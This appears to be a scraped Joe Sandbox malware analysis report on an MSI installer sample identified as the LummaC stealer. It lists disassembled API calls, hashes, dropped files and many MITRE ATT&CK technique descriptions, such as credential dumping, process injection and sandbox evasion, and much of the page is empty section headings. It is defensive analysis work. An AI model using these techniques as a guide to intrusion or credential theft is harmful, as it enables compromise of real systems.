Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 000888A0

Part of subcall function 00053588: _doexit.LIBCMT ref: 00053592

Strings

AutoIt, xrefs: 00088894
Error allocating memory., xrefs: 00088899

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 750f0268a32a34385972e4ab6bbc7076d6de158e9156d82abec826a0f7e2cd67
Instruction ID: 2ba491e971c922fce205619f689a54959634095946c720b3092327f6a0536321
Opcode Fuzzy Hash: 750f0268a32a34385972e4ab6bbc7076d6de158e9156d82abec826a0f7e2cd67
Instruction Fuzzy Hash: 48D02B7138135832D25037E46C0BFCB7A488B05B51F00443AFF08A91C34DD5958082E5

Function 00070251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00070091

Part of subcall function 000AC6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,0007027A,?), ref: 000AC6E7
Part of subcall function 000AC6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 000AC6F9

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00070289

Strings

WIN_XPe, xrefs: 000700A4

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 37a2ab666989dd682adcf106ce4c2e3ced85c2d6e1112e60618489fa92c3e5cf
Instruction ID: 57983c8f9b3c781368ee429ab147f1742783ff97e9f43599ed8333f1ba8e4b54
Opcode Fuzzy Hash: 37a2ab666989dd682adcf106ce4c2e3ced85c2d6e1112e60618489fa92c3e5cf
Instruction Fuzzy Hash: D3F06D70D1410ADFDB66DBA0C998BECBBF8AB08300F248085E10AB2191CB785F80DF64

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report NB4EASbynx.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\68e8f0.rbs

C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

C:\Users\user\AppData\Local\Temp\558563\k

C:\Users\user\AppData\Local\Temp\Analysts

C:\Users\user\AppData\Local\Temp\Assumed

C:\Users\user\AppData\Local\Temp\Basketball

C:\Users\user\AppData\Local\Temp\Beverages

C:\Users\user\AppData\Local\Temp\Cheque

C:\Users\user\AppData\Local\Temp\Displaying

Windows Analysis Report
NB4EASbynx.msi

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre